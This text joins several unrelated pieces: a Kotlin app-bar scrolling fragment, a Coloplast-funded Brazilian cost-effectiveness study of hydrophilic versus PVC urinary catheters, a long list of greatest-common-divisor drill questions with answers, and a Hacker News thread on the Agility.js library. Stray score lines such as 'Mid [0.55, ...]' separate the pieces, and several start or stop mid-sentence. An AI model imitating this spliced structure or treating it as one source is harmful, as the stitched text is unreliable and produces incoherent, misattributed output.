appBar.totalScrollRange.toFloat() } appBar.addOnOffsetChangedListener(AppBarLayout.OnOffsetChangedListener { _, verticalOffset -> // Add/remove padding gradually as the appbar scrolls. val percentOfScrollRange = (-verticalOffset / appBarTotalScrollRange) val deltaPadding = maxDeltaPadding * percentOfScrollRange val newTopPadding = baseTopPadding + deltaPadding.toInt() if (newTopPadding != viewToGrow.paddingTop) { viewToGrow.setPadding( viewToGrow.paddingLeft, newTopPadding, viewToGrow.paddingRight, viewToGrow.paddingBottom ) // Change the drawable radius as the appbar scrolls. if (backgroundRadii != null && maxRadius != null) { val radiusShrinkage = if (percentOfScrollRange > (1.0f - CORNER_SHRINK_RANGE)) { (1.0f - percentOfScrollRange) / CORNER_SHRINK_RANGE } else { 1.0f } backgroundRadii[0] = maxRadius[0] * radiusShrinkage backgroundRadii[1] = maxRadius[1] * radiusShrinkage backgroundRadii[2] = maxRadius[0] * radiusShrinkage backgroundRadii[3] = maxRadius[1] * radiusShrinkage backgroundDrawable!!.cornerRadii = backgroundRadii } } }) } companion object { const val CORNER_SHRINK_RANGE = 0.15f } }
Mid
[ 0.551487414187643, 30.125, 24.5 ]
INTRODUCTION ============ Every single year, almost 10,000 Brazilians suffer from a spinal cord injury (SCI) --- an injury that comes with great cost for the individual as well as for the public healthcare system ([@B1], [@B2]). As a consequence of the injury, 70% to 80% are diagnosed with detrusor sphincter dyssynergia, a dysfunction that leads to incomplete bladder emptying ([@B3]). National and International guidelines recommend bladder emptying with intermittent catheterization (IC) 4-6 times per day ([@B4]-[@B6]). Among the benefits of IC are the preservation of the structure and function of the upper urinary tract, reduced risk of vesicoureteral reflux, improvement of urinary continence and reduction of urinary tract infections (UTI). These benefits allow SCI patients to be more independent and have a better quality of life ([@B4]). Paradoxically, the most prominent consequence of IC is the recurrence of UTIs. In Brazil, quinolones are the first line of antibiotics used to treat UTIs. This treatment involves a resistance level above 30% in some regions ([@B7]). In Brazil, conventional uncoated polyvinylchloride (PVC) catheters, which require manual application of lubricant to ease and reduce friction, are the most frequently used catheters. Alternative catheters available in Brazil are the pre-lubricated hydrophilic coated ones. These catheters have a surface coating, which binds with water to form an even coating, thereby eliminating the need for manual application. At the same time, it most likely poses a lower risk of UTIs and hematuria to SCI patients. The aim of this study is to evaluate the cost-effectiveness of these two different types of catheter for IC in a lifetime perspective. The structure is based on an international published model ([@B8]) with adaptations to Brazilian costs and the healthcare system. MATERIALS AND METHODS ===================== Structure of the Model ---------------------- A Markov decision model was adjusted to Brazilian reality to evaluate the cost-effectiveness of hydrophilic coated versus uncoated PVC catheters used by SCI patients in Brazil. The analysis was performed using the Excel^®^ 2013 software to simulate, in monthly cycles, IC-related complications from the first catheterization until death (lifetime) ([Figure-1](#f1){ref-type="fig"}). For the primary analysis, all adverse events were taken into consideration, whereas the secondary analysis covered UTI as the single adverse event. ![Markov decision model - three renal stages and four urinary tract infection (UTI) levels regardless the impairment of renal function.](1677-5538-ibju-44-01-0121-gf01){#f1} Based on the original study by Clark et al., SCI patients suffer from chronic urinary retention (80% males, 20% females, average age 36 years old) ([@B8]). A consequence of urinary retention over a long period of time is the impairment of renal function. To reflect this reality, three renal stages were established in relation to its impact on the renal function: "No impairment", "Significant impairment" and "Renal failure". It is assumed that all new IC users will have "No impairment" and that it is not possible to recover or regress to a previous stage of renal function, but only progression of stages ([Figure-1](#f1){ref-type="fig"}). UTI is the most common complication of IC, and the current model consists of four different levels of UTIs that the SCI patient can go through. This is a modification compared to the original model by Clark et al., however it was considered relevant to describe the treatment pathways in Brazil. ([@B8]) In this study, we defined the following UTI levels: "No UTI", "UTI treated with first line antibiotics", "UTI resistant to first line antibiotics" and "UTIs resistant to second line antibiotics". All new IC users are simulated to have "No UTI". Regardless of impairment of renal function, SCI patient remains subject to the same UTI risk and treatment ([Figure-1](#f1){ref-type="fig"}). Additional adverse events considered as consequences of IC were the development of sepsis, urethral injury during catheterization and subsequent urethral stricture, and formation of stones within the urinary bladder. Data input ---------- The development of UTIs was considered the key parameter in the model. A systematic review of the literature was carried out with keywords and MeSH that covered Spinal Cord Injuries, Hydrophilic Coated Catheters, Economics, Costs, Cost Analysis, and related terms for both English and Spanish languages in the following databases: The Cochrance Library, MEDLINE via Pubmed, Literatura Latino-americana e do Caribe em Ciências da Saúde (LILACS), and Centre for Reviews and Dissemination (CRD). Further research was conducted on the websites of health technology assessment agencies and related institutions and their databases. Digital searches were complemented by manual searches of bibliographic references and abstracts of selected publications. This search resulted in identifying seventy-seven studies. Of these, only randomized clinical trials, meta-analysis, reviews, observational studies and economic evaluations published before May 2016 were selected. Eighteen studies met these inclusion criteria and were submitted for a complete review. The PICO (Population/Intervention/Comparison/Outcome) criteria were used for the structured question. Finally, four studies evaluating hydrophilic coated and uncoated PVC catheters met the criteria and were used for the cost-effectiveness study. The baseline risk of UTI was based on data from De Ridder et al. (2005) ([@B9]), Cardenas et al. (2009) ([@B10]), Cardenas et al. (2011) ([@B11]), and Sarica et al. (2010) ([@B12]). Individual data from each study were compiled to calculate the UTI incidence of both catheters. The relative risk (RR) of UTI per month between hydrophilic and PVC catheters was calculated for each one of the four studies mentioned above. A weighted average of the relative risks was calculated and based on it and the reduction risk of UTI was determined. ([Table-1](#t1){ref-type="table"}). ###### Urinary tract infection responding to initial antibiotic treatment. Source Catheter type Patients (N) UTI Incidence Mean Followup months UTIs per month Weighted average [1](#TFN1){ref-type="table-fn"} Relative Risk (RR): Hydrophilic coated vs PVC ----------------------------------------------------------------------------------- ---------------------------------------------------------- -------------- --------------- ---------------------- ---------------- -------------------------------------------------- ----------------------------------------------- **UTI rates in the uncoated PVC catheter population** Cardenas et al. (2011) ^a^ Conventional PVC 114 \- 3-6 0.48 54.49 \- Sarica et al. (2010) ^b^ Conventional PVC 21 4.00 1.5 2.67 56.00 \- Cardenas et al. (2009) ^c^ Conventional PVC 23 1.65 12 0.14 3.16 \- De Ridder et al. (2005) ^d^ Conventional PVC 61 \- 12 0.38 23.18 \- **Total** **219** **UTI rates in the hydrophilic coated catheter population** Cardenas et al. (2011) ^a^ Hydrophilic coated 105 \- 3-6 0.48 50.30 1.00 Sarica et al. (2010) ^b^ Hydrophilic coated 21 1.00 1.5 0.67 14.00 0.25 Cardenas et al. (2009) ^c^ Hydrophilic coated 22 0.77 12 0.06 1.41 0.47 De Ridder et al. (2005) ^d^ Hydrophilic coated 61 \- 12 0.34 20.74 0.89 **Total** **209** **Hydrophilic-coated versus conventional uncoated pvc catheter treatment effect** **0.84 (16% reduction)** [2](#TFN2){ref-type="table-fn"} number of patients x UTI per month mean relative risk weighted by the number of patients in each study - (RR a X N a) + (RR b X N b) + (RR c X N c) + (RR d X N d) / (N a + N b + N c + N d) The analysis was limited to bladder voiding through intermittent catheterization in the SCI population. Other methods for voiding dysfunction management, such as indwelling catheters or urostomies were not included, as they are associated with different risk profiles. We focused on IC, once the Brazilian Society of Urology recommends this treatment for long-term urinary retention patients with neurogenic voiding dysfunction. For bacterial resistance, the first line treatment was based on ciprofloxacin. The resistance rate of 34% was determined by D\'Addazio et al. ([@B7]). As second-line antibiotic, acetyl cefuroxime was adopted as the drug of choice for oral use in cases of failure in the first-line of antimicrobial treatment with a resistance level of 3.4% ([@B13]). A third-line antibiotic treatment was defined as ceftriaxone, through parenteral administration. The studies evaluated antibacterial resistance to community-acquired UTIs. For bacterial resistance rate to antibiotics, it was decided to use data outside of hospital settings only. All other complications included in the model can be found in [Table-2](#t2){ref-type="table"}. For these complications, the keywords and MeSH used in the literature search were the same previously described for the same database. Due to a limited number of studies regarding these other complications and their relation to different types of catheter, we decided to include observational studies, which resulted in three additional publications as listed on [Table-2](#t2){ref-type="table"} ([@B14]-[@B16]). ###### Key input parameters. Parameters Value Source/assumption ---------------------------------------------------- --------------------------------------------------------------------------- ------------------- --------------------------------------------------------------------------------------------- **Monthly adverse event rates (conventional PVC)** Urinary tract infections 62.48% De Rider et al. (2005), Cardenas et al. (2009) Cardenas et al. (2011), Sarica et al. (2010) Bladder stones 0.12% Perrouin-Verbe et al. (1995), Chai et al. (1995) Kidney stones 0.12% Assumed same bladder stones Urethral injury 0.19% Perrouin-Verbe et al. (1995), Chai et al. (1995) Urosepsis 0.32% Perrouin-Verbe et al. (1995), Chai et al. (1995), Weld et al. (2000) **Treatment effect (hydrophilic coated vs PvC)** Urinary tract infections 0.84 [Table 1](#t1){ref-type="table"} Bladder stones 0.90 Clark et al. (2016) Kidney stones 0.90 Clark et al. (2016) Urethral injury 0.90 Clark et al. (2016) Urosepsis 0.90 Clark et al. (2016) **Costs** Monthly cost, PVC catheter[\*](#TFN3){ref-type="table-fn"} R\$ 74.27 Banco de Preços em Saúde ([@B19]) Monthly cost, hydrophilic coated catheter[\*](#TFN3){ref-type="table-fn"} R\$ 608.27 Market Price Monthly cost, lubricant[\*](#TFN3){ref-type="table-fn"} R\$ 132.75 Banco de Preços em Saúde ([@B19]) Urinary tract infections, per event R\$ 554.16 SIGTAP/ TABNET ([@B20], [@B21]) Urinary tract infections, antibiotics[\*\*](#TFN4){ref-type="table-fn"} R\$ 60.50 Banco de Preços em Saúde ([@B19]) Urosepsis R\$ 708.36 SIGTAP/ TABNET ([@B20], [@B21]) Urethral injury R\$ 605.33 SIGTAP/ TABNET ([@B20], [@B21]) Kidney stones R\$ 524.30 SIGTAP/ TABNET ([@B20], [@B21]) Bladder stones R\$ 721.95 SIGTAP/ TABNET ([@B20], [@B21]) Major renal impairment, per month R\$ 82.60 SIGTAP/ TABNET ([@B20], [@B21]) Renal failure, per month R\$ 2,589.02 SIGTAP/ TABNET ([@B20], [@B21]) **Utility decrements** Urinary tract infection 0.060 NICE Model ([@B17]) Urinary tract infection, resistant 0.104 NICE Model ([@B17]) Kidney stones 0.050 Clark et al. (2015) Bladder stones 0.050 Clark et al. (2015) Urethral injury 0.104 NICE Model ([@B17]) Urosepsis 0.160 NICE Model ([@B17]) Major renal impairment 0.155 NICE Model ([@B17]) Renal failure 0.250 NICE Model ([@B17]) **Mortality multipliers** Urinary tract infection 0.000 Model structure Urinary tract infection, resistant[\*\*\*](#TFN5){ref-type="table-fn"} 145.270 Clark et al. (2015) Urinary tract infection, weighted[\*\*\*\*](#TFN6){ref-type="table-fn"} 49.390 Calculated based on Schito et al. (2009) ([@B13]) Urosepsis 797.600 Clark et al. (2015) Major renal impairment 18.000 Clark et al. (2015) Renal failure 54.000 Clark et al. (2015) Assuming the practice of four catheterizations per day for bladder emptying and the use of half a tube of lubricant per catheterization (2 tubes per day) Antibiotic therapy -- 1^st^ line (ciprofloxacin 500 mg every 12h for 7 days, oral use; resistance rate = 34%); Antibiotic therapy -- 2^nd^ line (cefuroxime 500 mg every 12h for 7 days, oral use; resistance rate = 3.4%) and Antibiotic therapy -- 3^rd^ line (ceftriaxone 1 g every 12h for 7 days, parenteral). Resistance rate to ciprofloxacin = 34%. s 145.27\*34%\* + 0.00\*66% Within the adopted model, a state of quality of life that follows each adverse event (utility) was included. We decided to use the original data from The National Institute of Health and Care Excellence (NICE), since there is no data available for the Brazilian population ([@B17]). For mortality rates, the 2014 Brazilian mortality board of Instituto Brasileiro de Geografia e Estatística (IBGE) ([@B18]) was used. The adjustment factors were based on Clark et al. ([@B8]) and D\'Addazio et al. ([@B7]). Cost Data --------- Costs related to UTI treatments, as well as the necessary materials for catheterization, were obtained from the Banco Nacional de Preços ([@B19]), except for the hydrophilic coated catheters, which were provided by a company in Brazil, considering the lowest individual price among catheters registered and approved by ANVISA (Brazilian Health Regulatory Agency). The consultation of a single local source (Banco Nacional de Preços) regarding the costs related to urinary tract infection was determined by the fact of being the aim of the current study to evaluate the cost-effectiveness of hydrophilic catheters from the perspective of the public healthcare system in Brazil. Banco Nacional de Preços is the sole official source used by the Brazilian government for budget calculation. The use of foreign countries' cost data could interfere with the analysis and results presented here. Costs due to lubrication, required when using uncoated PVC catheters, were considered as reusable lubricant, since this is the most common practice in Brazil, whilst the unit value of each lubricant package was divided by the average volume used in each procedure, for a mean of four catheterizations per day. As indicated by the manufacturer, the volume to be inserted into the urethra before each catheterization is estimated at 15 grams for men and 3 to 5 grams for women. In order to apply the relative proportion between sexes in the present study, it was estimated the use of two tubes a day for a total of four catheterizations. The costs related to procedures, diagnostic exams and treatment of adverse events were obtained from the SIGTAP table ([@B20]). The hospitalization costs were obtained from TABNET data ([@B21]). Both SIGTAP and TABNET correspond to the official sites for consultation adopted by the Brazilian government in the public healthcare system. For calculation purposes, patients who reach the hospitalization stage cost the public healthcare system approximately 525.60 BRL (Brazilian Reais) per UTI, and progression to sepsis costs 708.36 BRL. The list of all costs and sources are presented in [Table-2](#t2){ref-type="table"}. Output ------ Direct medical costs, life years gained (LYG), quality adjusted life years (QALY) and the number of UTIs avoided were calculated from the perspective of the Brazilian public healthcare system. An annual discount of 5% was applied to costs, QALY and LYG, but UTIs were not discounted. All results are reported as incremental cost-effectiveness ratio (ICER). A deterministic one-way sensitivity analysis of parameters was performed to assess the robustness of the variables in the model. Three parameters were considered key to results and deterministic analysis: amount of lubricant, resistance rates to antibiotics and UTI rates. No official threshold for ICER exists for the Brazilian population. In the UK, this figure is in the range of £20,000---£30,000 per QALY, and in the United States the threshold is US\$50,000. In Brazil, the ICER threshold was estimated by Prado as 147,000 BRL and this was the ICER threshold adopted for the evaluation of results in this cost-effectiveness study ([@B22]). RESULTS ======= Based on the studies from De Ridder et al. (2005) ([@B9]), Cardenas et al. (2009) ([@B10]), Cardenas et al. (2011) ([@B11]), and Sarica et al. (2010) ([@B12]), the monthly risk of developing UTI while using uncoated PVC catheters was estimated in 62%, with a reduction by 16% while using hydrophilic coated catheters ([Table-1](#t1){ref-type="table"}). Within a base case primary analysis, the model predicts that with an additional cost of 31,221 BRL per SCI patient within a life perspective, an IC user can live an additional 0.54 years with the use of hydrophilic coated catheters. In a Brazilian setting, the hydrophilic coated catheter is considered cost-effective at a level of 122,330 BRL per QALY for the base scenario ([Table-3](#t3){ref-type="table"}). ###### Cost-effectiveness results of primary analysis (all adverse events). Cost (BRL) QALYs LYG UTI ------------------------ ------------ ---------------------- ------- ------- Conventional PVC 17,255 2.550 5.689 54.73 Hydrophilic coated 48,476 2.805 6.233 51.53 Incremental values 31,221 0.255 0.544 -3.20 ICER (BRL/QALY gained) 122,330 BRL per QALY ICER (BRL/LYG) 57,432 BRL per LYG For the secondary analysis, considering only UTI as an adverse event related to IC, the ICER values of 57,468 BRL per LYG and 122,406 BRL per QALY were also considered cost effective in the Brazilian setting ([Table-4](#t4){ref-type="table"}). For the secondary analysis with UTI as the only parameter, the results indicate the need for an investment of approximately 9,778 BRL per avoided UTI. Additionally, the user will have a 6% reduction of UTIs requiring treatment and an increase in QALY by 0.25 within a life perspective. ###### Cost effectiveness results of secondary analysis (UTIs). Cost (BRL) QALYs LYG UTI ------------------------ ------------ --------------------------------- ------- ------- Conventional PVC 17,255 2.550 5.689 54.73 Hydrophilic coated 48,495 2.805 6.233 51.53 Incremental values 31,240 0.255 0.544 -3.20 ICER (BRL/QALY gained) 122,406 BRL per QALY ICER (BRL/LYG) 57,468 BRL per LYG ICER (BRL/UTI avoided) 9,778 BRL saved per UTI avoided Three parameters were identified relevant to investigate in a deterministic one-way sensitivity analysis (deterministic analysis): the lubrication, the bacteria resistance level and the UTI rate. ANVISA recommends that lubricants for uncoated catheters are single-use ([@B23]). Therefore, a one-way sensitivity analysis increases the number to four lubricants per day. By implementing the ANVISA recommendation, the incremental cost was reduced significantly to R\$ 86,831 per QALY. Implementing a conservative resistance rate for ciprofloxacin of 16.5% ([@B24]), results were still considered cost-effective at R\$ 122,527 per QALY. For UTI varying rates, it was decided to include results from a literature review carried out by Li et al. ([@B25]), and one scenario based on the study that has been conducted over a period of 10+ years on IC users by Cardenas et al. ([@B10]). Adopting different UTI rates, the levels implemented in the base scenario are highly cost-effective from 40,188 BRL to 76,796 BRL ([Table-5](#t5){ref-type="table"}). ###### Deterministic univariate sensitivity analysis. Parameters Value tested ICER (BRL/QALY) Source ---------------------------------------------------- -------------- ----------------- ------------------------------------------------------------ Deterministic results 122,330 \- **Lubricant tube per day** Base case 2 \- [Table 2](#t2){ref-type="table"} Alternative 4 86,831 ANVISA guideline 1 140,079 Assumed **Resistance level for antibiotics** Base case 34% \- D\'Addazio et al. (2015), [Table 2](#t2){ref-type="table"} Alternative 16% 122,527 Kiffer et al. (2011) 45% 122,206 Assumption **UTI reduction** [\*](#TFN7){ref-type="table-fn"} Base case 16% \- [Table 1](#t1){ref-type="table"} 26% 76,796 Li et al. (2013) Alternative 53% 40,188 Community data, Cardenas et al. (2009) The studies come with different UTI rates based on published information DISCUSSION ========== The most frequent complication of intermittent catheterization is urinary tract infection. A 12-year follow-up study showed that chronic or recurrent UTIs are as frequent as 42% in patients with IC ([@B26]). Throughout the last two decades, the increasing rates of bacterial resistance to antibiotics have worried the scientific community, and efforts have been made to reduce UTI rates. De Ridder et al. prospectively evaluated men with neurogenic bladder dysfunction due to spinal cord injury, and observed two times fewer symptomatic infections among those using hydrophilic catheters ([@B9]). Cardenas et al. demonstrated that patients with spinal cord injury using hydrophilic catheters required less antibiotic treatment for UTIs when compared to those using PVC catheters ([@B10]). In a randomized study, also with spinal cord injury patients monitored from the beginning of the rehabilitation phase, a 21% reduction rate was observed in the risk of UTI development in the initial rehabilitation phase and a delay in the occurrence of the first symptomatic UTI event ([@B11]). Forty percent of spinal cord injury patients with intermittent catheterization with hydrophilic catheters monitored over five to nine years still passed sterile urine ([@B27]). In a systematic review with five studies involving 462 patients, the incidence of symptomatic UTI and hematuria were significantly lower in the hydrophilic catheter group than in the non-hydrophilic catheter group ([@B25]). This study was designed to determine the cost-effectiveness of two different catheters used for patients with spinal cord injury in an intermittent catheterization program. It can provide local IC decision-makers with a tool that captures the relevant costs, consequences and benefits of two different types of catheters in a lifetime perspective. The model structure was based on a European model published in 2016, specially adapted to the Brazilian cost and public healthcare system ([@B8]). Despite no official cost-effectiveness threshold in Brazil, Prado et al. demonstrated that a threshold of up to 147,000 BRL is sufficient to consider cost-effectiveness in Brazil ([@B22]). Considering the above-mentioned threshold, after analyzing all possible adverse events of IC (primary analysis), as well as when UTI was the sole parameter considered (secondary analysis), the use of a hydrophilic coated catheter resulted in a highly cost-effective result. The deterministic sensitivity analysis revealed that despite the amount of lubricant used, the bacteria resistance rate to antibiotics and different UTI reduction rates, the cost-effectiveness favored hydrophilic coated catheters for the Brazilian scenario. The results match those from the original model from Europe ([@B8]), as well as a later Japanese version ([@B28]), where hydrophilic coated catheters were proved to be cost-effective despite their higher unit price. A key difference to the original model by Clark et al. ([@B8]) was the implementation of different treatment pathways in case of bacterial resistance, as well as a higher resistance level particularly to ciprofloxacin, the most commonly used antibiotic for treating UTIs in Brazil. It is well-known that the values of bacteria assumed in the current study were those based on community general population, and not specifically in patients with neurogenic bladder dysfunction. This is relevant, considering that a recent study conducted in the United States documented that SCI patients have higher rates of antibacterial resistance than those observed in the general population ([@B29]). The adopted model did not consider the important aspect of higher antibacterial resistance levels in relation to hospitals or rehabilitation centers. It is worth noting that the inputs were conservative, as the model assumes that all SCI patients enter the model without any complications except the need for IC. SCI patients are usually very complex due to several comorbidities. However, to ensure the model is as objective as possible and for the purpose of simplification, it was decided to conduct the analysis on less complex SCI patients. Although the practice of reusing uncoated PVC catheters in Brazil is common, according to the ANVISA, as well as included on the manufacturer\'s label, the catheters are not intended for anything more than single use. A recent study involving Paralympic athletes, including Brazilians, showed that those with re-used catheters presented more than twice the UTI rates compared to athletes from European countries, where hydrophilic coated catheters are the standard of care ([@B5], [@B30]). According to scientific evidence, the hydrophilic-coated catheters have a lower friction force, as well as lower rates of hematuria when compared to uncoated PVC catheters ([@B31]). However, these differences were not incorporated into the model. It is believed that performing at least four to six catheterizations per day with uncoated catheters is likely to raise the likelihood of urethral trauma. It has been documented that lack of preference for a specific catheter can reduce compliance and thereby increase the occurrence of catheter-related complications. Hydrophilic-coated catheters have been associated with greater patient satisfaction in aspects such as comfort and convenience when compared to uncoated PVC catheters ([@B30]-[@B32]). These parameters were not applicable in the structure of the current model due a lack of information regarding this subjective aspect in our country. Regarding uncoated PVC catheters, most of them contain softeners such as phthalates that may put the users at risk. Although the exposure to phthalates risk on the part of neither patients nor healthcare professionals was incorporated into this model, numerous investigations have demonstrated that with continuous exposure to phthalates, they will accumulate in the human body and therefore affect the hormones - especially in women and children ([@B33]). CONCLUSIONS =========== Despite a difference in unit cost of the two different types of catheters, the hydrophilic\--coated catheters seem to be cost-effective within a lifetime perspective for SCI patients. The results have not considered patient, urologist or other healthcare professional preference and convenience. An analysis such as a multi-criteria decision analysis would give better insight into the preferences of patients and healthcare professionals. Published as Ahead of Print: July 31, 2017 **FUNDING INFORMATION** Coloplast Brasil We would like to thank Heitor Romani Rodrigues and Mia Buus Andersen from Coloplast for the contribution in input to the model development and review of the manuscript. [^1]: **CONFLICT OF INTEREST** José Carlos Truzzi Speaker and Consultant - Coloplast Vanessa Teich Works at Sense Company Camila Pepe Works at Sense Company
Mid
[ 0.640306122448979, 31.375, 17.625 ]
he highest common divisor of 2 and 2857? 1 What is the greatest common factor of 8321 and 1166? 53 Calculate the greatest common divisor of 190 and 2535. 5 What is the greatest common factor of 22337747 and 1609? 1609 What is the highest common divisor of 2276 and 326037? 569 Calculate the highest common factor of 6519 and 3339. 159 What is the highest common factor of 55 and 1786972? 11 What is the greatest common factor of 287625 and 295? 295 Calculate the greatest common factor of 2870 and 40306. 14 Calculate the highest common factor of 111055 and 19285. 665 What is the highest common factor of 192874 and 16214? 242 Calculate the greatest common divisor of 240 and 36080. 80 Calculate the highest common factor of 3336551 and 113. 113 Calculate the greatest common factor of 2599 and 4393. 23 Calculate the greatest common divisor of 1234 and 1665283. 617 What is the highest common divisor of 5715 and 8955? 45 What is the greatest common factor of 1798 and 3658? 62 What is the greatest common factor of 7 and 34874? 7 Calculate the greatest common divisor of 162 and 1446. 6 Calculate the greatest common factor of 260 and 373100. 260 Calculate the highest common factor of 2 and 755732. 2 Calculate the greatest common factor of 200832 and 523. 523 Calculate the highest common divisor of 45 and 2907. 9 Calculate the greatest common divisor of 14958 and 2610. 18 Calculate the greatest common divisor of 40000 and 10. 10 What is the highest common divisor of 23036 and 520? 52 Calculate the greatest common divisor of 8694 and 155871. 621 What is the highest common factor of 546630 and 210? 210 What is the highest common factor of 600408 and 17216? 2152 What is the highest common divisor of 7830 and 14703? 87 What is the highest common divisor of 16169 and 296? 37 Calculate the highest common divisor of 1089 and 15488. 121 Calculate the greatest common divisor of 58 and 2165923. 29 Calculate the greatest common divisor of 17516 and 5436. 604 What is the highest common divisor of 485 and 3280? 5 What is the greatest common divisor of 2318 and 87230? 122 What is the greatest common divisor of 4330 and 80? 10 Calculate the greatest common divisor of 2130 and 3138555. 1065 Calculate the greatest common factor of 784775 and 75. 25 What is the highest common factor of 174 and 2946? 6 Calculate the greatest common factor of 18970 and 560. 70 What is the highest common factor of 68406 and 8? 2 What is the highest common divisor of 29340 and 1980? 180 What is the highest common divisor of 6127 and 737? 11 What is the greatest common divisor of 3569 and 46895? 83 What is the greatest common factor of 3031 and 3464? 433 What is the highest common factor of 2780 and 28900? 20 What is the greatest common factor of 51145 and 2385? 265 What is the greatest common factor of 28875 and 5082? 231 What is the greatest common factor of 76 and 10110014? 38 Calculate the highest common factor of 15975 and 1845. 45 Calculate the greatest common factor of 10465 and 89180. 455 What is the greatest common factor of 69444 and 354? 6 What is the greatest common factor of 129521 and 7? 7 What is the highest common factor of 68849 and 47227? 569 Calculate the highest common factor of 1995422 and 3718. 286 What is the greatest common factor of 836 and 80465? 209 What is the highest common divisor of 1628430 and 1545? 1545 What is the greatest common divisor of 69116 and 296? 148 Calculate the highest common factor of 82 and 243499. 41 What is the highest common factor of 41623 and 18283? 389 What is the highest common factor of 71965 and 370? 185 What is the greatest common factor of 24910 and 309520? 530 Calculate the greatest common factor of 59708 and 11. 11 Calculate the highest common factor of 716796 and 972. 108 Calculate the greatest common divisor of 16116 and 4. 4 Calculate the highest common divisor of 33915 and 15. 15 What is the greatest common factor of 138244 and 1615? 323 Calculate the highest common factor of 4440 and 17464. 296 Calculate the highest common factor of 46 and 6854. 46 Calculate the greatest common divisor of 5928 and 362076. 156 Calculate the greatest common divisor of 35 and 43883. 7 Calculate the greatest common divisor of 282 and 788754. 282 What is the greatest common divisor of 124899 and 474? 237 What is the greatest common factor of 4030677 and 137? 137 Calculate the greatest common divisor of 120 and 6870. 30 Calculate the greatest common divisor of 102 and 318. 6 What is the highest common divisor of 50265 and 900? 45 Calculate the highest common divisor of 358600 and 7700. 1100 Calculate the greatest common factor of 177160 and 30100. 860 Calculate the highest common divisor of 11122 and 402. 134 What is the greatest common factor of 12030 and 5730? 30 Calculate the highest common divisor of 33714 and 18. 18 What is the highest common factor of 2796584 and 7? 7 Calculate the highest common divisor of 56573 and 3197. 139 What is the greatest common divisor of 628 and 712? 4 Calculate the highest common divisor of 10688 and 22879. 167 What is the greatest common factor of 4680 and 1508? 52 Calculate the highest common divisor of 64 and 2048. 64 What is the greatest common factor of 37 and 123? 1 What is the greatest common factor of 1238464 and 1? 1 Calculate the greatest common factor of 1624 and 6583. 29 Calculate the highest common divisor of 489240 and 151. 151 Calculate the greatest common divisor of 126472 and 64. 8 What is the highest common factor of 29 and 10034551? 29 Calculate the greatest common factor of 144386 and 110. 22 Calculate the highest common divisor of 178503 and 299. 299 Calculate the highest common divisor of 1257572 and 304. 76 Calculate the highest common factor of 428 and 23576. 4 What is the greatest common divisor of 56296 and 192? 8 Calculate the highest common divisor of 28912 and 2171. 13 Calculate the greatest common factor of 440 and 65912. 88 What is the greatest common divisor of 7363 and 3922? 37 What is the highest common divisor of 201 and 638108? 67 Calculate the greatest common factor of 1287 and 5304. 39 Calculate the greatest common factor of 36168 and 40. 8 Calculate the greatest common divisor of 336 and 6496. 112 Calculate the highest common divisor of 132855 and 255. 255 What is the greatest common factor of 36 and 113895? 9 What is the highest common divisor of 1462 and 21998? 34 Calculate the highest common divisor of 8190 and 274820. 910 What is the highest common factor of 1003490 and 460? 230 What is the greatest common factor of 165450 and 320? 10 What is the greatest common factor of 1854 and 432? 18 What is the greatest common divisor of 1067562 and 24? 6 Calculate the highest common divisor of 9542 and 624. 26 Calculate the greatest common divisor of 20 and 380560. 20 Calculate the greatest common factor of 47016 and 72. 72 Calculate the greatest common factor of 6265 and 105. 35 Calculate the highest common factor of 149 and 8540531. 149 Calculate the greatest common divisor of 18578 and 3. 1 Calculate the highest common divisor of 3906 and 13314. 42 Calculate the highest common divisor of 684 and 1824. 228 What is the greatest common factor of 615 and 10004? 41 What is the highest common factor of 167167 and 4928? 77 What is the greatest common divisor of 715880 and 136? 8 What is the highest common divisor of 168 and 159208? 56 Calculate the highest common divisor of 122 and 70333. 61 What is the highest common factor of 8193 and 7? 1 What is the greatest common divisor of 126 and 69867? 63 What is the highest common divisor of 6 and 57774? 6 Calculate the greatest common divisor of 265982 and 102. 34 What is the greatest common divisor of 35754 and 15150? 606 Calculate the highest common divisor of 7897 and 13708. 149 What is the highest common divisor of 100 and 135850? 50 Calculate the highest common factor of 360631 and 47. 47 Calculate the greatest common factor of 6300 and 1305. 45 What is the highest common divisor of 3278 and 308? 22 What is the greatest common divisor of 42 and 115682? 14 What is the greatest common factor of 3630 and 474? 6 Calculate the greatest common divisor of 72 and 16056. 72 What is the highest common factor of 19044 and 108? 36 What is the highest
Low
[ 0.512690355329949, 25.25, 24 ]
Agility.js - Javascript MVC for the "write less, do more" programmer - arturadib http://agilityjs.com ====== JesseAldridge I looked into using Backbone for my current project, and took a peek at several other MVC libs as well. In the end I decided they all did way more than I was looking for. I just wanted a simple way to separate my models from the DOM. This project seems better than anything else I've seen, but still, 1000 loc seems like a whole lot. Here's how I'm currently doing it: window.models = {} function json_to_model(json, parent_model) { // Create initial attrs. var id = '' + Math.round(Math.random() * 100000000000) var children = json.children delete json.children json['id'] = id; json.is_expanded = true json.child_ids = []; json.parent_id = null; if(parent_model) { json.parent_id = parent_model.get('id') var child_ids = parent_model.get('child_ids') child_ids.push(json.id) parent_model.set('child_ids', child_ids) } // Store models. Recurse children. var new_model = {attrs:json} add_get_set(new_model) window.models[id] = new_model render_model(new_model) if(children) { for(var i = 0; i < children.length; i++) json_to_model(children[i], new_model) } return new_model } // Get and set. Render on set. function add_get_set(model) { model.get = function(key){ return this.attrs[key] } model.set = function(key, val) { this.attrs[key] = val render_model(this) localStorage.setItem('models', JSON.stringify(window.models)) } } Now, that doesn't do much. But for prototyping a gui, it seems pretty good. Less is more. I wonder how little code I can add to get it to work with a real backend. ~~~ delambo If this solves your problem, then you probably didn't need MVC in the first place. But this doesn't necessarily decouple you from the DOM, and it sounds like all of the code that works with these models is a bunch of jQuery callbacks hooked into the DOM. Is that right? If so, and your project is sizable, then an MVC, like backbone.js, could be beneficial. ~~~ JesseAldridge The code can work with the models without touching the DOM. You just access the models via ids. eg parent_model = window.models[foo_model.get('parent_id')] parent_model.set('text', 'foo text') When you respond to a button click or whatever, then yeah, you use a jQuery callback. The model id is stored in the DOM element (the view) which you access with $(this). Whenever the model changes (via set), the render function is automatically called. The render function is responsible for passing attributes to a template which renders html. Then the render function sticks the html wherever it's supposed to go. I think that's basically how all MVC frameworks work under the hood. ------ timruffles Looks like a nice mix of concepts you've seen in dojo/Backbone (very similar #set #get ersatz message passing etc) with those in Knockout (two-way model/view binding). The combined JS/CSS widget definitions make sense for people writing components. ------ rushabh This is really nice. The code of the demo app reads quite well - not only is it small its quite readable... I was thinking of using backbone for my next rewrite. Will have a serious look at this. ------ tommoor Not liking all that html/js mixed together in every single example... Each to their own! :-) ~~~ arturadib Hi there, that's actually something I like about Agility, but I will soon add support for HTML templates outside of JS objects. PS: 